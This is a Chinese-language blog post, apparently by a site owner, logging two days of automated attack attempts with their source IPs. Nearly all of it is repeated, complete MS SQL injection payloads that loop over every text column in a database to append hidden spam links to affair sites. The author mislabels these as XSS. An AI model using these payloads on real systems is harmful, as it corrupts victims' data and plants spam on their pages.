入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://www.avonotakaronetwork.co.nz/blog/page/I-cheated-on-my-boyfriend">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''go'' when 1 then ''click'' else ''married men and affairs'' end +''</a> women that cheat with married men</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://solluna.somee.com/page/I-cheated-on-my-boyfriend.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''married men and affairs'' when 1 then ''why women cheat with married men'' else ''looking for affair'' end +''</a> what is infidelity</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://solluna.somee.com/page/I-cheated-on-my-boyfriend.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''married men and affairs'' when 1 then ''why women cheat with married men'' else ''looking for affair'' end +''</a> what is infidelity</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://solluna.somee.com/page/I-cheated-on-my-boyfriend.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''married men and affairs'' when 1 then ''why women cheat with married men'' else ''looking for affair'' end +''</a> what is infidelity</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://solluna.somee.com/page/I-cheated-on-my-boyfriend.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''married men and affairs'' when 1 then ''why women cheat with married men'' else ''looking for affair'' end +''</a> what is infidelity</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''women who cheat on husbands'' when 1 then ''website'' else ''read here'' end +''</a> why women cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''women who cheat on husbands'' when 1 then ''website'' else ''read here'' end +''</a> why women cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''women who cheat on husbands'' when 1 then ''website'' else ''read here'' end +''</a> why women cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''women who cheat on husbands'' when 1 then ''website'' else ''read here'' end +''</a> why women cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://blog.businessdating.com/page/How-women-cheat">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''when women cheat'' when 1 then ''what makes married men cheat'' else ''click'' end +''</a> open</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://blog.businessdating.com/page/How-women-cheat">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''when women cheat'' when 1 then ''what makes married men cheat'' else ''click'' end +''</a> open</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://blog.businessdating.com/page/How-women-cheat">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''when women cheat'' when 1 then ''what makes married men cheat'' else ''click'' end +''</a> open</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:62.243.46.155
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://blog.businessdating.com/page/How-women-cheat">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''when women cheat'' when 1 then ''what makes married men cheat'' else ''click'' end +''</a> open</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

很明顯是XSS攻擊,而且透過系統濫發。以上只是截取部分資料,其實全部有一大串,足足攻擊了兩天。已經被reject還一直測試,看來攻擊的robot有點stupid。

沒有留言:

張貼留言

若有任何建議歡迎留言詢問